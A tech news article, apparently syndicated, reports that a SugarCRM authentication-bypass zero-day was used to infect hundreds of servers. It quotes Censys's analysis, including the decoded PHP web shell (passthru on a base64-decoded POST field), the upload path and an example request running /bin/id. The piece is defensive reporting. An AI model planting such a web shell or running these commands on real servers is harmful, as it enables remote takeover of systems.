TeqGo.com
No Result
View All Result
No Result
View All Result
TeqGo.com
No Result
View All Result
Home Computer

Hundreds of SugarCRM servers infected with critical in-the-wild exploit

Staff by Staff
January 12, 2023
in Computer
0
First LastPass, now Slack and CircleCI. The hacks go on (and will likely worsen)
465
SHARES
1.5k
VIEWS
Share on FacebookShare on Twitter


For the past two weeks, hackers have been exploiting a critical vulnerability in the SugarCRM (customer relationship management) system to infect users with malware that gives them full control of their servers.

The vulnerability began as a zero-day when the exploit code was posted online in late December. The person posting the exploit described it as an authentication bypass with remote code execution, meaning an attacker could use it to run malicious code on vulnerable servers with no credentials required. SugarCRM has since published an advisory that confirms that description. The exploit post also included various “dorks,” which are simple web searches people can do to locate vulnerable servers on the Internet.

Mark Ellzey, senior security researcher at network monitoring service Censys said in an email that as of January 11, the company had detected 354 SugarCRM servers infected using the zero-day. That’s close to 12 percent of the total 3,059 SugarCRM servers Censys detected. As of last week, infections were highest in the US, with 90, followed by Germany, Australia, and France. In an update on Tuesday, Censys said the number of infections hasn’t ticked up much since the original post.

Advertisement

SugarCRM’s advisory, published on January 5, made hotfixes available and said it had already been applied to its cloud-based service. It also advised users with instances running outside of SugarCloud or SugarCRM-managed hosting to install the hotfixes. The advisory said that the vulnerability affected Sugar Sell, Serve, Enterprise, Professional, and Ultimate software solutions. It didn’t impact the Sugar Market software.

The authentication bypass, Censys said, works against the /index.php/ directory. “After the authentication bypass is successful, a cookie is obtained from the service, and a secondary POST request is sent to the path ‘/cache/images/sweet.phar’ which uploads a tiny PNG-encoded file containing PHP code that will be executed by the server when another request for the file is made,” company researchers added.

When the binary is analyzed using hexdump software and decoded, the PHP code roughly translates to:

〈?php
echo “#####”;
passthru(base64_decode($_POST[“c”]));
echo “#####”;
?〉

“This is a simple web shell that will execute commands based on the base64-encoded query argument value of ‘c’ (e.g., ‘POST /cache/images/sweet.phar?c=”L2Jpbi9pZA==” HTTP/1.1’, which will execute the command “/bin/id” with the same permissions as the user-id running the web service),” the post explained.

A web shell provides a text-based window that attackers can use as an interface for running commands or code of their choice on compromised devices. Ellzey of Censys said the company didn’t have visibility into precisely what attackers are using the shells for.

Both Censys and SugarCRM advisories provide indicators of compromise that SugarCRM customers can use to determine if they’ve been targeted. Users of vulnerable products should investigate and install hotfixes as soon as possible.



Source link

Previous Post

How To Delete A Truecaller Account

Next Post

Questions Linger After FAA Glitch Temporarily Grounds All US Flights

Next Post
Questions Linger After FAA Glitch Temporarily Grounds All US Flights

Questions Linger After FAA Glitch Temporarily Grounds All US Flights

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Recommended.

New Kickstarter: Folding, Stacked Monitors With Built-in Docking Station

New Kickstarter: Folding, Stacked Monitors With Built-in Docking Station

August 20, 2022
Differences between iPhone 7 Models

Differences between iPhone 7 and iPhone 7 Plus

June 15, 2020

Trending.

What happened to Andrew Humphrey on Channel 4 weather?

August 24, 2022

Who is the new weather man on Channel 4 Detroit?

August 24, 2022

Why is Ben Bailey leaving WDIV?

August 24, 2022

What is a 100000 year period called?

August 23, 2022

Who recently left WDIV?

August 24, 2022
  • About us
  • Contact Us
  • Home
  • Privacy Policy and Disclaimer

© 2021-2023 Teqgo.com

No Result
View All Result
  • About us
  • Contact Us
  • Home
  • Privacy Policy and Disclaimer

© 2021-2023 Teqgo.com